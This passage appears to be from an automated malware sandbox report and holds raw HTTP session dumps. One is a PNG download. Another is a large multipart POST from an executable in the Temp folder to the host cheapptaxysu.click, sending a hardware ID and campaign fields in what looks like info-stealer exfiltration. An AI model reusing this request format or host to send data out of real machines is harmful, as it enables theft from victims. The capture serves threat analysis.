                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC4864INData Raw: aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 bb 10 1f aa
                                                                                                                                                                                                                                                              Data Ascii: L%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1320INData Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43
                                                                                                                                                                                                                                                              Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: bc b8 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93
                                                                                                                                                                                                                                                              Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: 62 3d fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a
                                                                                                                                                                                                                                                              Data Ascii: b=v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: f8 29 d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be
                                                                                                                                                                                                                                                              Data Ascii: )f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: e6 8b 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79
                                                                                                                                                                                                                                                              Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2y
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: 2d df 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5
                                                                                                                                                                                                                                                              Data Ascii: -6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: 45 39 d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7
                                                                                                                                                                                                                                                              Data Ascii: E9sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1390INData Raw: c5 96 ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5
                                                                                                                                                                                                                                                              Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.2.449885104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC366OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=WDQ0LOOQQN
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 549427
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                                                                              Data Ascii: --WDQ0LOOQQNContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--WDQ0LOOQQNContent-Disposition: form-data; name="pid"1--WDQ0LOOQQNContent-Disposition: form-data; name="lid"CZJvss--geopoxid--WDQ0LOOQQNConte
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca 7e 63
                                                                                                                                                                                                                                                              Data Ascii: Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(~c
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da da 49
                                                                                                                                                                                                                                                              Data Ascii: cC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{aI
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c e4 60
                                                                                                                                                                                                                                                              Data Ascii: iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL`
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7 27 a0
                                                                                                                                                                                                                                                              Data Ascii: ,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J'
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26 26 55
                                                                                                                                                                                                                                                              Data Ascii: TL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&&U
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86 e2 58
                                                                                                                                                                                                                                                              Data Ascii: nT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02qX
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8 a4 45
                                                                                                                                                                                                                                                              Data Ascii: BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?tE
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a b2 29
                                                                                                                                                                                                                                                              Data Ascii: vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(mI)
